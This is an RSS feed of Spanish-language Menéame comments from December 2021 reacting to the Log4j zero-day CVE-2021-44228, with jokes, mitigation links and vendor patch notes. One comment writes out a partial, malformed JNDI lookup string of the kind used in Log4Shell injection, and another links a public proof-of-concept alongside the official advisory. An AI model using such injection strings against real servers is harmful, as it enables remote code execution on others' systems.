		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c015#c-15</link>
		<pubDate>Fri, 10 Dec 2021 19:33:19 +0000</pubDate>
		<dc:creator>Mutiko30</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c015#c-15</guid>
		<description><![CDATA[<p>Ok,  es que Windows es un sistema malo, malo ,malo... Oh wait!</p><p>&#187;&nbsp;autor: <strong>Mutiko30</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519242</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>14</meneame:order>
		<meneame:user>--94561--</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#14 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c014#c-14</link>
		<pubDate>Fri, 10 Dec 2021 19:25:39 +0000</pubDate>
		<dc:creator>--94561--</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c014#c-14</guid>
		<description><![CDATA[<p>No entiendo exactamente...<br />
<br />
Hay alguna PoC por ahi?</p><p>&#187;&nbsp;autor: <strong>--94561--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519235</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>13</meneame:order>
		<meneame:user>--689577--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>-6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#13 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c013#c-13</link>
		<pubDate>Fri, 10 Dec 2021 19:24:45 +0000</pubDate>
		<dc:creator>--689577--</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c013#c-13</guid>
		<description><![CDATA[<p><img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/sad.png" alt=":-(" title=":-(" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /> Demasiados componentes/librerías/módulos y demasiada complejidad... Toca hacer un cambio de paradigma de programación (Soft+Hard)...</p><p>&#187;&nbsp;autor: <strong>--689577--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519169</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>12</meneame:order>
		<meneame:user>urannio</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#12 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c012#c-12</link>
		<pubDate>Fri, 10 Dec 2021 19:15:42 +0000</pubDate>
		<dc:creator>urannio</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c012#c-12</guid>
		<description><![CDATA[<p>Solamente <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/shit.png" alt=":shit:" title=":shit:" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /> <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/shit.png" alt=":shit:" title=":shit:" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /> <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/shit.png" alt=":shit:" title=":shit:" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /></p><p>&#187;&nbsp;autor: <strong>urannio</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519126</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>11</meneame:order>
		<meneame:user>ronko</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>7</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#11 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c011#c-11</link>
		<pubDate>Fri, 10 Dec 2021 19:07:43 +0000</pubDate>
		<dc:creator>ronko</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c011#c-11</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-9" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c09#c-9" rel="nofollow">#9</a>  El launcher me manda este sitio para solucionarlo, la versión actual está parcheada ya: <a href="https://www.minecraft.net/es-es/article/important-message--security-vulnerability-java-edition?ref=launcher" title="www.minecraft.net/es-es/article/important-message--security-vulnerability-java-edition?ref=launcher" rel="nofollow">www.minecraft.net/es-es/article/important-message--security-vulnerabil</a></p><p>&#187;&nbsp;autor: <strong>ronko</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519124</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>10</meneame:order>
		<meneame:user>code2011</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#10 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c010#c-10</link>
		<pubDate>Fri, 10 Dec 2021 19:06:54 +0000</pubDate>
		<dc:creator>code2011</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c010#c-10</guid>
		<description><![CDATA[<p>Vaya día le ha dado la vulnerabilidad esta</p><p>&#187;&nbsp;autor: <strong>code2011</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34519114</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>9</meneame:order>
		<meneame:user>EmuAGR</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#9 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c09#c-9</link>
		<pubDate>Fri, 10 Dec 2021 19:05:22 +0000</pubDate>
		<dc:creator>EmuAGR</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c09#c-9</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-4" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c04#c-4" rel="nofollow">#4</a> Hay un montón de versiones de Minecraft vulnerables. Edit: Ahora he visto que era irónico...</p><p>&#187;&nbsp;autor: <strong>EmuAGR</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34517560</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>8</meneame:order>
		<meneame:user>el-brujo</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>9</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#8 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c08#c-8</link>
		<pubDate>Fri, 10 Dec 2021 14:31:26 +0000</pubDate>
		<dc:creator>el-brujo</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c08#c-8</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-7" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c07#c-7" rel="nofollow">#7</a> ah jaja perdón, pensaba que el comentario iba en serio.<br />
<br />
 $(jndi):ldap:// en todas partes <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/lol.gif" alt="xD" title=":lol: xD" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /><br />
o<br />
 $(jndi):rdmi://</p><p>&#187;&nbsp;autor: <strong>el-brujo</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34517507</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>7</meneame:order>
		<meneame:user>insulabarataria</meneame:user>
		<meneame:votes>8</meneame:votes>
		<meneame:karma>58</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#7 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c07#c-7</link>
		<pubDate>Fri, 10 Dec 2021 14:22:22 +0000</pubDate>
		<dc:creator>insulabarataria</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c07#c-7</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-6" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c06#c-6" rel="nofollow">#6</a> estaba siendo irónico...</p><p>&#187;&nbsp;autor: <strong>insulabarataria</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34517365</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>6</meneame:order>
		<meneame:user>el-brujo</meneame:user>
		<meneame:votes>4</meneame:votes>
		<meneame:karma>40</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#6 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c06#c-6</link>
		<pubDate>Fri, 10 Dec 2021 14:00:55 +0000</pubDate>
		<dc:creator>el-brujo</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c06#c-6</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-4" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c04#c-4" rel="nofollow">#4</a> Los servicios en la nube como Steam, Apple iCloud y aplicaciones como Minecraft son vulnerables.</p><p>&#187;&nbsp;autor: <strong>el-brujo</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34517074</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>5</meneame:order>
		<meneame:user>keiko_san</meneame:user>
		<meneame:votes>6</meneame:votes>
		<meneame:karma>46</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#5 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c05#c-5</link>
		<pubDate>Fri, 10 Dec 2021 13:20:11 +0000</pubDate>
		<dc:creator>keiko_san</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c05#c-5</guid>
		<description><![CDATA[<p><a class="tooltip c:3594248-4" href="https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c04#c-4" rel="nofollow">#4</a> Yo soy mas de system.out</p><p>&#187;&nbsp;autor: <strong>keiko_san</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34517057</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>4</meneame:order>
		<meneame:user>insulabarataria</meneame:user>
		<meneame:votes>13</meneame:votes>
		<meneame:karma>86</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#4 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c04#c-4</link>
		<pubDate>Fri, 10 Dec 2021 13:16:43 +0000</pubDate>
		<dc:creator>insulabarataria</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c04#c-4</guid>
		<description><![CDATA[<p>Bah, no creo que log4j se use mucho.</p><p>&#187;&nbsp;autor: <strong>insulabarataria</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34516987</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>3</meneame:order>
		<meneame:user>el-brujo</meneame:user>
		<meneame:votes>8</meneame:votes>
		<meneame:karma>65</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#3 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c03#c-3</link>
		<pubDate>Fri, 10 Dec 2021 13:05:35 +0000</pubDate>
		<dc:creator>el-brujo</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c03#c-3</guid>
		<description><![CDATA[<p>CVE-2021-44228, &#34;es grave &#34; --&#62; es muy grave,  Gravedad CVSS 10 sobre 10 . No hay nada más grave.<br />
Mitigaciones:<br />
<a href="https://www.lunasec.io/docs/blog/log4j-zero-day/" title="www.lunasec.io/docs/blog/log4j-zero-day/" rel="nofollow">www.lunasec.io/docs/blog/log4j-zero-day/</a><br />
PoC:<br />
<a href="https://github.com/tangxiaofeng7/apache-log4j-poc" title="github.com/tangxiaofeng7/apache-log4j-poc" rel="nofollow">github.com/tangxiaofeng7/apache-log4j-poc</a><br />
Web oficial:<br />
<a href="https://logging.apache.org/log4j/2.x/security.html" title="logging.apache.org/log4j/2.x/security.html" rel="nofollow">logging.apache.org/log4j/2.x/security.html</a></p><p>&#187;&nbsp;autor: <strong>el-brujo</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34516952</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>2</meneame:order>
		<meneame:user>dsj</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>25</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#2 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c02#c-2</link>
		<pubDate>Fri, 10 Dec 2021 13:02:07 +0000</pubDate>
		<dc:creator>dsj</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c02#c-2</guid>
		<description><![CDATA[<p>Dolor mucho dolor ...</p><p>&#187;&nbsp;autor: <strong>dsj</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34516810</meneame:comment_id>
		<meneame:link_id>3594248</meneame:link_id>
		<meneame:order>1</meneame:order>
		<meneame:user>tiopio</meneame:user>
		<meneame:votes>4</meneame:votes>
		<meneame:karma>63</meneame:karma>
		<meneame:url>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya</meneame:url>
		<title>#1 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)</title>
		<link>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c01#c-1</link>
		<pubDate>Fri, 10 Dec 2021 12:43:25 +0000</pubDate>
		<dc:creator>tiopio</dc:creator>
		<guid>https://www.meneame.net/story/aviso-seguridad-nueva-vulnerabilidad-zero-day-biblioteca-java-ya/c01#c-1</guid>
		<description><![CDATA[<p>Para más info: <a href="https://www.randori.com/blog/cve-2021-44228/" title="www.randori.com/blog/cve-2021-44228/" rel="nofollow">www.randori.com/blog/cve-2021-44228/</a></p><p>&#187;&nbsp;autor: <strong>tiopio</strong></p>]]></description>
	</item>

</channel>
</rss>
